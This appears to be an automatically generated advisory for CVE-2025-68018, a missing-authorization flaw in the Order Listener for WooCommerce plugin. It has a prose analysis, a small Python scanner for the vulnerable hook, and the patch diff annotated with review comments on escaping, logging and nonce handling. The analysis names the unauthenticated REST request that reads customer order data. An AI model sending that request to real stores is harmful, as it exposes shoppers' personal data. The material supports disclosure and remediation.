Atomic Edge Proof of Concept automated generator using AI diff analysis
Published: March 18, 2026

CVE-2025-68018: Order Listener for WooCommerce <= 3.6.1 – Missing Authorization (woc-order-alert)

Severity: Medium (CVSS 5.3)
CWE: 862
Vulnerable Version: 3.6.1
Patched Version: 3.6.2
Disclosed: January 18, 2026

Analysis Overview

Atomic Edge analysis of CVE-2025-68018:
The Order Listener for WooCommerce plugin for WordPress, versions up to and including 3.6.1, contains a missing authorization vulnerability. This flaw allows unauthenticated attackers to bypass permission checks for the WooCommerce REST API, potentially leading to unauthorized access to sensitive order data.

The root cause is an improper filter hook implementation in the `class-hooks.php` file. In the vulnerable version, the plugin hooks the `woocommerce_rest_check_permissions` filter to the `__return_true` function at line 29. This filter is used by WooCommerce to check permissions for REST API requests. By unconditionally returning `true`, the plugin effectively disables all permission checks for any WooCommerce REST API endpoint, regardless of the user’s authentication status or capabilities.

An attacker can exploit this vulnerability by sending unauthenticated HTTP requests to any WooCommerce REST API endpoint. The attack vector is the standard WooCommerce REST API, typically accessible at `/wp-json/wc/v3/`. For example, an attacker could send a GET request to `/wp-json/wc/v3/orders` to retrieve all orders, or to `/wp-json/wc/v3/orders/{id}` to access specific order details, without providing any authentication credentials. No special parameters or payloads are required beyond the standard API endpoint structure.

The patch addresses the vulnerability by replacing the `__return_true` callback with a custom method named `woa_check_permissions` at line 29 of `class-hooks.php`. This new method, defined at lines 44-54, performs a proper capability check using `current_user_can( 'manage_woocommerce' )`. It returns `true` only if the current user has the `manage_woocommerce` capability, which is typically granted to shop managers and administrators. If the user lacks this capability, the method returns the original `$permission` value, allowing WooCommerce's default permission checks to proceed. This ensures that only authorized users can access WooCommerce REST API endpoints.
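The two hook registrations described above (the vulnerable `__return_true` callback and its patched replacement) are easy to check for statically, which is how a defender would confirm whether an installed plugin tree still carries the weak form. The following is an added example, not code from the advisory or the plugin: it scans PHP source for `add_filter()` calls that hook an authorization filter to `__return_true`. The hook name comes from the advisory; the `AUTHZ_FILTERS` set, the function names and the two sample snippets are assumptions constructed for the example.

```python
import re
from pathlib import Path

# Authorization filters where an unconditional `__return_true` callback
# disables the check entirely. The WooCommerce hook is the one named in the
# advisory; the set itself is an assumption and can be extended.
AUTHZ_FILTERS = {"woocommerce_rest_check_permissions"}

# Matches add_filter( 'hook', '__return_true' ... ) with either quote style,
# tolerating whitespace; the hook name is captured for the allow-list check.
_ALLOW_ALL = re.compile(
    r"""add_filter\s*\(\s*(['"])(?P<hook>[^'"]+)\1\s*,\s*(['"])__return_true\3"""
)


def find_unconditional_allow(source: str, path: str = "<memory>") -> list:
    """Return one finding per line that hooks an authorization filter to __return_true."""
    findings = []
    for lineno, line in enumerate(source.splitlines(), start=1):
        for match in _ALLOW_ALL.finditer(line):
            hook = match.group("hook")
            if hook in AUTHZ_FILTERS:
                findings.append({"file": path, "line": lineno, "hook": hook})
    return findings


def scan_plugin_dir(root: str) -> list:
    """Walk a plugin directory (e.g. wp-content/plugins/<slug>) and collect findings."""
    findings = []
    for php_file in sorted(Path(root).rglob("*.php")):
        text = php_file.read_text(encoding="utf-8", errors="replace")
        findings.extend(find_unconditional_allow(text, str(php_file)))
    return findings


# Constructed samples modelled on the hook registrations shown in the diff;
# these are not the plugin's actual files.
VULNERABLE_HOOKS = """<?php
add_filter( 'woocommerce_webhook_deliver_async', '__return_false' );
add_filter( 'woocommerce_rest_check_permissions', '__return_true' );
"""

PATCHED_HOOKS = """<?php
add_filter( 'woocommerce_webhook_deliver_async', '__return_false' );
add_filter( 'woocommerce_rest_check_permissions', array( $this, 'woa_check_permissions' ), 10, 4 );
"""

if __name__ == "__main__":
    for label, src in (("vulnerable", VULNERABLE_HOOKS), ("patched", PATCHED_HOOKS)):
        print(label, find_unconditional_allow(src))
```

Point `scan_plugin_dir()` at an extracted plugin directory to check a deployment; a finding on `woocommerce_rest_check_permissions` means the site is still running the pre-3.6.2 behaviour regardless of what the plugin header says. The `__return_false` registration on the webhook hook in the sample is deliberately left unflagged, since only an unconditional grant on an authorization filter is the defect.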

Successful exploitation allows unauthenticated attackers to read, and potentially modify depending on the HTTP method, WooCommerce order data through the REST API. This includes sensitive customer information such as names, email addresses, physical addresses, phone numbers, and order details. The vulnerability could lead to data breaches, violation of privacy regulations, and unauthorized access to business transaction records. The CVSS score of 5.3 reflects the medium severity of this information disclosure vulnerability.

Differential between vulnerable and patched code

Code Diff
--- a/woc-order-alert/includes/class-functions.php
+++ b/woc-order-alert/includes/class-functions.php
@@ -83,7 +83,7 @@
 				$is_success = $is_success ? 'success' : 'error';
 			}

-			printf( '<div class="notice notice-%s %s"><p>%s</p></div>', $is_success, $is_dismissible ? 'is-dismissible' : '', $message );
+			printf( '<div class="notice notice-%1$s %2$s"><p>%3$s</p></div>', esc_attr( $is_success ), $is_dismissible ? 'is-dismissible' : '', wp_kses_post( $message ) );
 		}

 		/**
@@ -103,7 +103,7 @@
 			$option_val = get_option( $option_key, $default_val );
 			$option_val = empty( $option_val ) ? $default_val : $option_val;

-			return apply_filters( 'woc_filters_option_' . $option_key, $option_val );
+			return apply_filters( 'woc_filters_option_' . $option_key, $option_val ); // phpcs:ignore WordPress.NamingConventions.PrefixAllGlobals.NonPrefixedHooknameFound
 		}

 		/**
@@ -125,7 +125,7 @@
 			$meta_value = get_post_meta( $post_id, $meta_key, true );
 			$meta_value = empty( $meta_value ) ? $default : $meta_value;

-			return apply_filters( 'woc_filters_get_meta', $meta_value, $meta_key, $post_id, $default );
+			return apply_filters( 'woc_filters_get_meta', $meta_value, $meta_key, $post_id, $default ); // phpcs:ignore WordPress.NamingConventions.PrefixAllGlobals.NonPrefixedHooknameFound
 		}

 		/**
--- a/woc-order-alert/includes/class-hooks.php
+++ b/woc-order-alert/includes/class-hooks.php
@@ -26,7 +26,7 @@
 			add_action( 'admin_bar_menu', array( $this, 'handle_admin_bar_menu' ), 9999, 1 );

 			add_filter( 'woocommerce_webhook_deliver_async', '__return_false' );
-			add_filter( 'woocommerce_rest_check_permissions', '__return_true' );
+			add_filter( 'woocommerce_rest_check_permissions', array( $this, 'woa_check_permissions' ), 10, 4 );
 			add_filter( 'plugin_row_meta', array( $this, 'add_plugin_meta' ), 10, 2 );
 			add_filter( 'plugin_action_links_' . OLISTENER_PLUGIN_FILE, array( $this, 'add_plugin_actions' ), 10, 2 );
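Review bot: the replacement is registered with accepted-args 4, which matches the new method's signature, and it hands WooCommerce's own decision back as the default, which is the right shape for the fix. One question for this hunk: it is not clear the plugin needs to touch `woocommerce_rest_check_permissions` at all. If the only intent is that shop managers and administrators can use the order endpoints, and WooCommerce's own capability checks already admit them, deleting the `add_filter` line is the smaller and safer change; if the filter must stay, a comment saying which endpoint or role it exists for would help the next reader.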

@@ -35,6 +35,22 @@
 			add_action( 'woocommerce_new_order', array( $this, 'woocommerce_new_order' ), 10, 2 );
 		}

+		/**
+		 * Proper permission check for WooCommerce REST API
+		 *
+		 * @param bool   $permission Current permission value
+		 * @param string $context   Request context (read/write)
+		 * @param int    $object_id Post / product ID
+		 * @param string $post_type Post type (product, order, etc.)
+		 * @return bool Permission result
+		 */
+		public function woa_check_permissions( $permission, $context, $object_id, $post_type ) {
+			if ( current_user_can( 'manage_woocommerce' ) ) {
+				return true;
+			}
+			return $permission;
+		}
+

 		/**
 		 * Add capabilities to shop manager for Order Notifier
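Review bot: `woa_check_permissions` ignores three of its four parameters: `$context`, `$object_id` and `$post_type` are received but never consulted, so any holder of `manage_woocommerce` gets `true` for every WooCommerce REST object type (products, customers, coupons) in both read and write contexts, not only for orders. If the filter is meant to cover the order endpoints, gate the grant on `$post_type` and return `$permission` unchanged for everything else, so the plugin does not widen access beyond what it needs. The doubled blank line after the closing brace is a style nit.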
@@ -155,8 +171,8 @@

 			global $wpdb;

-			$all_orders           = $wpdb->get_results(
-				$wpdb->prepare( "SELECT * FROM {$wpdb->prefix}woocommerce_order_listener WHERE read_status = %s", 'unread' )
+			$all_orders           = $wpdb->get_results( // phpcs:ignore WordPress.DB.DirectDatabaseQuery.DirectQuery, WordPress.DB.DirectDatabaseQuery.NoCaching
+				$wpdb->prepare( "SELECT * FROM {$wpdb->prefix}woocommerce_order_listener WHERE read_status = %s", 'unread' )
 			);
 			$all_orders           = ! is_array( $all_orders ) ? array() : $all_orders;
 			$order_list_items_all = olistener()->get_order_list_items();
@@ -169,7 +185,7 @@

 				if ( ! $order instanceof WC_Order ) {
 					$trashed_items ++;
-					$wpdb->delete( OLISTENER_DATA_TABLE, array( 'order_id' => $order_item->order_id ) );
+					$wpdb->delete( OLISTENER_DATA_TABLE, array( 'order_id' => $order_item->order_id ) ); // phpcs:ignore WordPress.DB.DirectDatabaseQuery.DirectQuery, WordPress.DB.DirectDatabaseQuery.NoCaching
 					continue;
 				}

@@ -193,9 +209,9 @@
 					$item_data[] = sprintf( '<div class="olistener-row-item"><div class="order-action mark-read tt--top" aria-label="%s"><span class="dashicons dashicons-visibility"></span></div></div>', esc_html__( 'Mark as Read', 'woc-order-alert' ) );
 				}

-				printf( '<div class="olistener-row order-%s">%s</div>', $order->get_id(), implode( '', $item_data ) );
+				printf( '<div class="olistener-row order-%s">%s</div>', esc_attr( $order->get_id() ), wp_kses_post( implode( '', $item_data ) ) );

-				$wpdb->update( OLISTENER_DATA_TABLE, array( 'read_status' => 'read' ), array( 'id' => $order_item->id ) );
+				$wpdb->update( OLISTENER_DATA_TABLE, array( 'read_status' => 'read' ), array( 'id' => $order_item->id ) ); // phpcs:ignore WordPress.DB.DirectDatabaseQuery.DirectQuery, WordPress.DB.DirectDatabaseQuery.NoCaching
 			}

 			wp_send_json_success(
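Review bot: `wp_kses_post()` now wraps the whole `$item_data` string, which includes the `<div ... aria-label="...">` markup assembled a few lines up. kses drops attributes that are not on its allow list, so confirm in the rendered admin page that `aria-label` and the `dashicons` span survive the filter; if they do not, escape the pieces where they are built (`esc_attr()` on the label text, `esc_html()` on visible text) and print the assembled row directly.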
@@ -223,7 +239,7 @@
 			if ( apply_filters( 'olistener_filters_should_notify', true, $order_id, $order ) ) {

 				$order_total  = $order->get_total();
-				$all_orders   = $wpdb->get_results(
+				$all_orders   = $wpdb->get_results( // phpcs:ignore WordPress.DB.DirectDatabaseQuery.DirectQuery, WordPress.DB.DirectDatabaseQuery.NoCaching
 					$wpdb->prepare( "SELECT * FROM {$wpdb->prefix}woocommerce_order_listener WHERE order_id = %d", $order_id )
 				);
 				$all_orders   = ! is_array( $all_orders ) ? array() : $all_orders;
@@ -238,10 +254,10 @@

 				if ( $latest_order ) {
 					if ( current_time( 'U' ) - strtotime( $latest_order->datetime ) > 10 ) {
-						$wpdb->insert( OLISTENER_DATA_TABLE, $order_args );
+						$wpdb->insert( OLISTENER_DATA_TABLE, $order_args ); // phpcs:ignore WordPress.DB.DirectDatabaseQuery.DirectQuery
 					}
 				} else {
-					$wpdb->insert( OLISTENER_DATA_TABLE, $order_args );
+					$wpdb->insert( OLISTENER_DATA_TABLE, $order_args ); // phpcs:ignore WordPress.DB.DirectDatabaseQuery.DirectQuery
 				}
 			}
 		}
--- a/woc-order-alert/includes/class-olistener-pro.php
+++ b/woc-order-alert/includes/class-olistener-pro.php
@@ -2,6 +2,8 @@

 use WPDKUtils;

+defined( 'ABSPATH' ) || exit;
+
 if ( ! class_exists( 'OlistenerPro' ) ) {
 	class OlistenerPro {

@@ -40,7 +42,7 @@
 		public function apply_pro_settings( $should_notify, $order_id, $order = null ) {

 			// Debug: Log the function call
-			error_log('OlistenerPro::apply_pro_settings called for order ID: ' . $order_id);
+			error_log('OlistenerPro::apply_pro_settings called for order ID: ' . $order_id); // phpcs:ignore WordPress.PHP.DevelopmentFunctions.error_log_error_log

 			// Remove the activation check that might be blocking the logic
 			// The PRO functionality should work regardless of activation status for testing
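Review bot: the `error_log()` call is kept and only the sniff is silenced, yet the surrounding comments ("Debug: Log the function call", "for testing") describe development scaffolding. Shipping it writes every order ID to the server error log on every notification. Either remove the debug lines or gate them behind `WP_DEBUG`; the comment stating that the activation check was removed "for testing" also should not remain in a release.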
@@ -56,7 +58,7 @@
 			$order              = $order ?: wc_get_order( $order_id );

 			if (!$order instanceof WC_Order) {
-				error_log('OlistenerPro - Invalid order object for ID: ' . $order_id);
+				error_log('OlistenerPro - Invalid order object for ID: ' . $order_id); // phpcs:ignore WordPress.PHP.DevelopmentFunctions.error_log_error_log
 				return $should_notify;
 			}

@@ -169,25 +171,25 @@
 			$rules_relation = (array) Utils::get_option('olistener_rules_relation', array());

 			// Debug: Log the summary and rules
-			error_log('OlistenerPro - Summary: ' . print_r($summary, true));
-			error_log('OlistenerPro - Rules Relation: ' . print_r($rules_relation, true));
+			error_log('OlistenerPro - Summary: ' . print_r($summary, true)); // phpcs:ignore WordPress.PHP.DevelopmentFunctions.error_log_error_log, WordPress.PHP.DevelopmentFunctions.error_log_print_r
+			error_log('OlistenerPro - Rules Relation: ' . print_r($rules_relation, true)); // phpcs:ignore WordPress.PHP.DevelopmentFunctions.error_log_error_log, WordPress.PHP.DevelopmentFunctions.error_log_print_r

 			// If no rules are selected, return true if any condition is met
 			if (empty($rules_relation)) {
 				$result = in_array(true, $summary);
-				error_log('OlistenerPro - No rules selected, result: ' . ($result ? 'true' : 'false'));
+				error_log('OlistenerPro - No rules selected, result: ' . ($result ? 'true' : 'false')); // phpcs:ignore WordPress.PHP.DevelopmentFunctions.error_log_error_log
 				return $result;
 			}

 			// Check if all selected rules are satisfied
 			foreach ($rules_relation as $rule) {
 				if (!isset($summary[$rule]) || !$summary[$rule]) {
-					error_log('OlistenerPro - Rule "' . $rule . '" failed or not set');
+					error_log('OlistenerPro - Rule "' . $rule . '" failed or not set'); // phpcs:ignore WordPress.PHP.DevelopmentFunctions.error_log_error_log
 					return false;
 				}
 			}

-			error_log('OlistenerPro - All rules passed, returning true');
+			error_log('OlistenerPro - All rules passed, returning true'); // phpcs:ignore WordPress.PHP.DevelopmentFunctions.error_log_error_log
 			return true;
 		}
 	}
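Review bot: `print_r($summary, true)` and `print_r($rules_relation, true)` dump the full rule-evaluation arrays to the error log for every order, and this hunk only adds `phpcs:ignore` annotations instead of removing them. Error logs are frequently readable by other tenants on shared hosting and are shipped to third-party log collectors, so this is a data-exposure issue rather than a style one; drop the calls or wrap them in a `WP_DEBUG` check.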
--- a/woc-order-alert/includes/class-plugin-settings.php
+++ b/woc-order-alert/includes/class-plugin-settings.php
@@ -205,9 +205,9 @@
 							'type'         => 'checkbox',
 							'options'      => olistener()->get_rules_relations(),
 							'desc'         => esc_html__( 'Please select the conditions you wish to check for new order checking.', 'woc-order-alert' ) . '<br>' .
-							                  __( '<strong>Multi conditions selected</strong> - System will notify you only if all the checked conditions are matched.' ) . '<br>' .
-							                  __( '<strong>Single condition selected</strong> - System will notify you only when the selected condition is matched.' ) . '<br>' .
-							                  __( '<strong>No condition selected</strong> - System will notify you if any of the condition is matched.' ),
+							                  __( '<strong>Multi conditions selected</strong> - System will notify you only if all the checked conditions are matched.', 'woc-order-alert' ) . '<br>' .
+							                  __( '<strong>Single condition selected</strong> - System will notify you only when the selected condition is matched.', 'woc-order-alert' ) . '<br>' .
+							                  __( '<strong>No condition selected</strong> - System will notify you if any of the condition is matched.', 'woc-order-alert' ),
 							'availability' => olistener()->is_pro() ? '' : 'pro',
 							'dependency'   => array( 'olistener_enable_rules', '==', true ),
 						),
--- a/woc-order-alert/includes/functions.php
+++ b/woc-order-alert/includes/functions.php
@@ -8,6 +8,7 @@

 use WPDKUtils;

+defined( 'ABSPATH' ) || exit;

 if ( ! function_exists( 'olistener' ) ) {
 	function olistener() {
@@ -91,6 +92,7 @@
 			$order_customers[] = sprintf( '<a href="%s">#%s</a>', admin_url( 'edit.php?post_type=shop_order&_customer_user=' . $order_customer_id ), $order->get_billing_first_name() );
 		}

-		return sprintf( esc_html__( 'Congratulations! You have received order(%s) from %s' ), implode( ', ', $order_ids ), implode( ', ', $order_customers ) );
+		/* translators: 1: Order IDs, 2: Customer Names */
+		return sprintf( esc_html__( 'Congratulations! You have received order(%1$s) from %2$s', 'woc-order-alert' ), implode( ', ', $order_ids ), implode( ', ', $order_customers ) );
 	}
 }
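Review bot: the translator comment and text domain are fine, but `esc_html__()` escapes only the format string, not the substituted values. `$order_customers` is built on the unchanged line above from `$order->get_billing_first_name()` and an `admin_url()` string, neither of which is escaped, and a customer controls their own billing name. Wrap the name in `esc_html()` and the link in `esc_url()` where the anchor is built.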
--- a/woc-order-alert/includes/wp-dev-kit/classes/class-client.php
+++ b/woc-order-alert/includes/wp-dev-kit/classes/class-client.php
@@ -10,6 +10,8 @@

 use WPDK_Settings;

+defined( 'ABSPATH' ) || exit;
+
 /**
  * Class Client
  *
@@ -136,7 +138,7 @@
 	 */
 	function manage_permanent_dismissible() {

-		$query_args = wp_unslash( array_map( 'sanitize_text_field', $_GET ) );
+		$query_args = wp_unslash( array_map( 'sanitize_text_field', $_GET ) ); // phpcs:ignore WordPress.Security.NonceVerification.Recommended

 		if ( Utils::get_args_option( 'pb_action', $query_args ) == 'permanent_dismissible' && ! empty( $id = Utils::get_args_option( 'id', $query_args ) ) ) {
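Review bot: the order of operations on the `$_GET` line is inverted: `sanitize_text_field()` runs on the slashed values and `wp_unslash()` afterwards, the reverse of the WordPress convention `sanitize_text_field( wp_unslash( ... ) )`. The added `phpcs:ignore` hides only the nonce-verification sniff; the ordering should be swapped, e.g. `array_map( 'sanitize_text_field', wp_unslash( $_GET ) )`, and since this handler performs a state change (permanent dismissal of a notice) a nonce on the dismiss link would be better than suppressing the warning.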

@@ -218,12 +220,12 @@
 						'id'        => $permanent_dismiss
 					), site_url( 'wp-admin' )
 				) ),
-				esc_html__( 'Dismiss', $this->text_domain )
+				esc_html__( 'Dismiss', $this->text_domain ) // phpcs:ignore WordPress.WP.I18n.NonSingularStringLiteralDomain
 			);
 		}

 		if ( ! empty( $message ) ) {
-			printf( '<div class="notice notice-%s %s">%s%s</div>', $type, $is_dismissible, $message, $pb_dismissible );
+			printf( '<div class="notice notice-%s %s">%s%s</div>', $type, $is_dismissible, $message, $pb_dismissible ); // phpcs:ignore WordPress.Security.EscapeOutput.OutputNotEscaped
 			?>
             <style>
                 .pb-is-dismissible {
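Review bot: the notice `printf()` prints `$type`, `$is_dismissible`, `$message` and `$pb_dismissible` raw, and the change adds an `OutputNotEscaped` suppression instead of escaping. `$message` legitimately carries HTML from callers (the license notice in `class-license.php` passes a `wp_kses_post()`-filtered string), so `wp_kses_post( $message )` here plus `esc_attr()` on `$type` and `$is_dismissible` would keep the behaviour while protecting against any caller that does not pre-filter.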
@@ -294,7 +296,7 @@
 	public function get_website_url( $path = '' ) {

 		if ( is_multisite() && isset( $_SERVER['SERVER_NAME'] ) ) {
-			return sanitize_text_field( $_SERVER['SERVER_NAME'] ) . '/' . $path;
+			return sanitize_text_field( $_SERVER['SERVER_NAME'] ) . '/' . $path; // phpcs:ignore WordPress.Security.ValidatedSanitizedInput.MissingUnslash
 		}

 		return site_url( $path );
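Review bot: `$_SERVER['SERVER_NAME']` is used to build a URL and the change only suppresses the missing-unslash sniff. Depending on web server configuration, `SERVER_NAME` can be derived from the client-supplied `Host` header, and the value is returned without a scheme. Since the non-multisite branch already uses `site_url( $path )`, `network_site_url( $path )` would be a more reliable source for the multisite case.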
--- a/woc-order-alert/includes/wp-dev-kit/classes/class-license.php
+++ b/woc-order-alert/includes/wp-dev-kit/classes/class-license.php
@@ -7,6 +7,8 @@

 use WP_REST_Request;

+defined( 'ABSPATH' ) || exit;
+
 class License {

 	protected $client;
@@ -91,7 +93,7 @@
 		if ( ! isset( $schedules['daily'] ) ) {
 			$schedules['daily'] = array(
 				'interval' => 24 * HOUR_IN_SECONDS,
-				'display'  => esc_html__( 'Daily' ),
+				'display'  => esc_html__( 'Daily', 'woc-order-alert' ),
 			);
 		}

@@ -111,7 +113,7 @@
 		$params = $request->get_body_params();

 		if ( empty( $license_data = Utils::get_args_option( 'license_data', $params ) ) ) {
-			return new WP_REST_Response( array( 'code' => 404, 'message' => esc_html__( 'License data not found.', $this->client->text_domain ) ) );
+			return new WP_REST_Response( array( 'code' => 404, 'message' => esc_html__( 'License data not found.', $this->client->text_domain ) ) ); // phpcs:ignore WordPress.WP.I18n.NonSingularStringLiteralDomain
 		}

 		update_option( $this->option_key, $license_data );
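Review bot: this REST handler writes `license_data` from the request body straight into an option via `update_option()`. The route registration is not in the hunk, so confirm that the route's `permission_callback` is a real capability check (for example `manage_options`) and not `__return_true`, given that this advisory is about exactly that pattern. The added `phpcs:ignore` on the text-domain line does not touch that concern.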
@@ -273,7 +275,7 @@
 	function add_plugin_action_links( $links ) {

 		return array_merge( array(
-			'license' => sprintf( '<a href="%s">%s</a>', $this->license_page_url, esc_html__( 'License', $this->client->text_domain ) ),
+			'license' => sprintf( '<a href="%s">%s</a>', $this->license_page_url, esc_html__( 'License', $this->client->text_domain ) ), // phpcs:ignore WordPress.WP.I18n.NonSingularStringLiteralDomain
 		), $links );
 	}

@@ -283,12 +285,20 @@
 	 */
 	function license_activation_notices() {

-		if ( $this->is_valid() || ( isset( $_GET['page'] ) && sanitize_text_field( $_GET['page'] == $this->menu_args['menu_slug'] ) ) ) {
+		if ( $this->is_valid() || ( isset( $_GET['page'] ) && sanitize_text_field( $_GET['page'] == $this->menu_args['menu_slug'] ) ) ) { // phpcs:ignore WordPress.Security.NonceVerification.Recommended
 			return;
 		}
-
-		$license_message = sprintf( __( '<p>You must activate <strong>%s</strong> to unlock the premium features, enable single-click download, and etc. Dont have your key? <a href="%s" target="_blank">Your license keys</a></p><p><a class="button-primary" href="%s">Activate License</a></p>' ),
-			$this->client->plugin_name, sprintf( '%s/my-account/license-keys/', $this->client->integration_server ), $this->license_page_url
+		$license_message = sprintf(
+			wp_kses_post(
+				/* translators: 1: Plugin name, 2: License keys URL, 3: Activation page URL */
+				__(
+					'<p>You must activate <strong>%1$s</strong> to unlock the premium features, enable single-click download, and etc. Don’t have your key? <a href="%2$s" target="_blank">Your license keys</a></p><p><a class="button-primary" href="%3$s">Activate License</a></p>',
+					$this->client->text_domain // phpcs:ignore WordPress.WP.I18n.NonSingularStringLiteralDomain
+				)
+			),
+			esc_html( $this->client->plugin_name ),
+			esc_url( sprintf( '%s/my-account/license-keys/', $this->client->integration_server ) ),
+			esc_url( $this->license_page_url )
 		);

 		$this->client->print_notice( $license_message, 'warning' );
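Review bot: the condition on the first line has a precedence bug that survives the change: `sanitize_text_field( $_GET['page'] == $this->menu_args['menu_slug'] )` sanitizes the boolean result of the comparison, so the query value itself is never sanitized or unslashed. It should read `sanitize_text_field( wp_unslash( $_GET['page'] ) ) === $this->menu_args['menu_slug']`. The rewritten license message (`wp_kses_post()` on the template, `esc_html()` and `esc_url()` on the arguments) is the right pattern.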
@@ -304,10 +314,11 @@

 		$defaults = array(
 			'type'        => 'submenu', // Can be: menu, options, submenu
-			'page_title'  => sprintf( __( 'Manage License - %s', $this->client->text_domain ), $this->client->plugin_name ),
-			'menu_title'  => __( 'Manage License', $this->client->text_domain ),
+			/* translators: %s: Plugin name */
+			'page_title' => sprintf( __( 'Manage License - %s', $this->client->text_domain ), esc_html( $this->client->plugin_name ) ), // phpcs:ignore WordPress.WP.I18n.NonSingularStringLiteralDomain
+			'menu_title' => __( 'Manage License', $this->client->text_domain ), // phpcs:ignore WordPress.WP.I18n.NonSingularStringLiteralDomain
 			'capability'  => 'manage_options',
-			'menu_slug'   => $this->client->text_domain . '-manage-license',
+			'menu_slug'   => $this->client->text_domain . '-manage-license', // phpcs:ignore WordPress.WP.I18n.NonSingularStringLiteralDomain
 			'position'    => null,
 			'icon_url'    => '',
 			'parent_slug' => '',
@@ -371,24 +382,34 @@
 	 */
 	public function render_license_page() {

-		if ( isset( $_POST['submit'] ) ) {
+		if ( isset( $_POST['submit'] ) ) { // phpcs:ignore WordPress.Security.NonceVerification.Missing
 			$this->process_form_submission();
 		}

 		$this->render_licenses_style();

-		$get_string         = array_map( 'sanitize_text_field', $_GET );
-		$script_name        = sanitize_text_field( $_SERVER['SCRIPT_NAME'] );
+		$get_string         = array_map( 'sanitize_text_field', $_GET ); // phpcs:ignore WordPress.Security.NonceVerification.Recommended
+		$script_name        = sanitize_text_field( $_SERVER['SCRIPT_NAME'] ); // phpcs:ignore WordPress.Security.ValidatedSanitizedInput.InputNotValidated, WordPress.Security.ValidatedSanitizedInput.MissingUnslash
 		$license_form_url   = add_query_arg( $get_string, admin_url( basename( $script_name ) ) );
 		$license_action     = $this->is_valid() ? 'slm_deactivate' : 'slm_activate';
 		$license_readonly   = $this->is_valid() ? 'readonly="readonly"' : '';
-		$license_submit_btn = $this->is_valid() ? __( 'Deactivate License', $this->client->text_domain ) : __( 'Activate License', $this->client->text_domain );
+		$license_submit_btn = $this->is_valid() ? __( 'Deactivate License', $this->client->text_domain ) : __( 'Activate License', $this->client->text_domain ); // phpcs:ignore WordPress.WP.I18n.NonSingularStringLiteralDomain

 		?>
         <div class="wrap pb-license-settings-wrapper">
             <h1>
-				<?php printf( __( 'License settings for <strong>%s</strong>', $this->client->text_domain ), $this->client->plugin_name ); ?>
-				<?php printf( __( '<sub style="font-size: 12px; vertical-align: middle;">%s</sub>' ), $this->plugin_version ); ?>
+				<?php
+					printf(
+							/* translators: %s: Plugin name */
+							__( 'License settings for <strong>%s</strong>', $this->client->text_domain ), // phpcs:ignore WordPress.WP.I18n.NonSingularStringLiteralDomain,WordPress.Security.EscapeOutput.OutputNotEscaped
+							$this->client->plugin_name // phpcs:ignore WordPress.Security.EscapeOutput.OutputNotEscaped
+						);  ?>
+				<?php
+					printf(
+						/* translators: %s: Plugin version */
+						__( '<sub style="font-size: 12px; vertical-align: middle;">%s</sub>', 'woc-order-alert' ),  $this->plugin_version // phpcs:ignore WordPress.WP.I18n.NoHtmlWrappedStrings, WordPress.Security.EscapeOutput.OutputNotEscaped
+					);
+				?>
             </h1>

             <div class="pb-license-settings action-<?php echo esc_attr( $license_action ); ?>">
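Review bot: the heading `printf()` still prints `$this->client->plugin_name` raw and only adds `OutputNotEscaped` suppressions; `esc_html( $this->client->plugin_name )` is the fix, and the menu-defaults hunk above already does exactly that for `page_title`. Separately, `$license_form_url` is assembled from every `$_GET` parameter plus `basename( $_SERVER['SCRIPT_NAME'] )`, so whatever prints it must escape for attribute context; `add_query_arg()` does not.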
@@ -399,13 +420,18 @@
                         <path d="m150 85.849c-13.111 0-23.775 10.665-23.775 23.775v25.319h47.548v-25.319c-1e-3 -13.108-10.665-23.775-23.773-23.775z"/>
                         <path d="m150 1e-3c-82.839 0-150 67.158-150 150 0 82.837 67.156 150 150 150s150-67.161 150-150c0-82.839-67.161-150-150-150zm46.09 227.12h-92.173c-9.734 0-17.626-7.892-17.626-17.629v-56.919c0-8.491 6.007-15.582 14.003-17.25v-25.697c0-27.409 22.3-49.711 49.711-49.711 27.409 0 49.709 22.3 49.709 49.711v25.697c7.993 1.673 14 8.759 14 17.25v56.919h2e-3c0 9.736-7.892 17.629-17.626 17.629z"/>
                     </svg>
-                    <span><?php esc_html_e( 'Manage License', $this->client->text_domain ); ?></span>
+                    <span><?php esc_html_e( 'Manage License', $this->client->text_domain ); // phpcs:ignore WordPress.WP.I18n.NonSingularStringLiteralDomain ?></span>
                 </div>

                 <div class="pb-license-details">
                     <p>
                         <label for="pb-license-field">
-							<?php printf( __( 'Activate or Deactivate <strong>%s</strong> by your license key to get support and automatic update from your WordPress dashboard.' ), $this->client->plugin_name ); ?>
+							<?php printf(
+										/* translators: %s: Plugin name */
+										__( 'Activate or Deactivate <strong>%s</strong> by your license key to get support and automatic update from your WordPress dashboard.', 'woc-order-alert' ), // phpcs:ignore WordPress.Security.EscapeOutput.OutputNotEscaped
+										$this->client->plugin_name // phpcs:ignore WordPress.Security.EscapeOutput.OutputNotEscaped
+									);
+							?>
                         </label>
                     </p>
                     <form method="post" action="<?php echo esc_url_raw( $license_form_url ); ?>" novalidate="novalidate" spellcheck="false">
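Review bot: the form action on the last context line uses `esc_url_raw()`, which is meant for database storage and redirects; in an HTML attribute `esc_url()` is the right call because it entity-encodes `&`, and `$license_form_url` is built from reflected `$_GET` parameters, so this is where the encoding matters. The `printf()` above it still prints `$this->client->plugin_name` behind an escaping suppression; `esc_html()` it.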
@@ -422,16 +448,20 @@
                                         id="pb-license-field"
                                         autocomplete="off"
                                         value="<?php echo esc_attr( $this->get_license_key_for_input_field( $license_action ) ); ?>"
-                                        placeholder="<?php echo esc_attr( __( 'Enter your license key to activate', $this->client->text_domain ) ); ?>"/>
+                                        placeholder="<?php echo esc_attr( __( 'Enter your license key to activate', $this->client->text_domain ) ); // phpcs:ignore WordPress.WP.I18n.NonSingularStringLiteralDomain ?>"/>
                             </div>
                             <button type="submit" name="submit"><?php echo esc_html( $license_submit_btn ); ?></button>
                         </div>
                     </form>
                     <p>
-						<?php printf( __( 'Find your %s and %s latest version from your account.', $this->client->text_domain ),
-							sprintf( '<a target="_blank" href="%s/my-account/license-keys/"><strong>%s</strong></a>', $this->client->integration_server, esc_html__( 'License keys', $this->client->text_domain ) ),
-							sprintf( '<a target="_blank" href="%s/my-account/downloads/"><strong>%s</strong></a>', $this->client->integration_server, esc_html__( 'Download', $this->client->text_domain ) )
-						); ?>
+						<?php
+							printf(
+								/* translators: 1: License keys link, 2: Download link */
+								wp_kses_post( __( 'Find your %1$s and %2$s latest version from your account.', $this->client->text_domain ) ), // phpcs:ignore WordPress.WP.I18n.NonSingularStringLiteralDomain
+								sprintf( '<a target="_blank" href="%1$s"><strong>%2$s</strong></a>', esc_url( $this->client->integration_server . '/my-account/license-keys/' ), esc_html__( 'License keys', $this->client->text_domain ) ), // phpcs:ignore WordPress.WP.I18n.NonSingularStringLiteralDomain
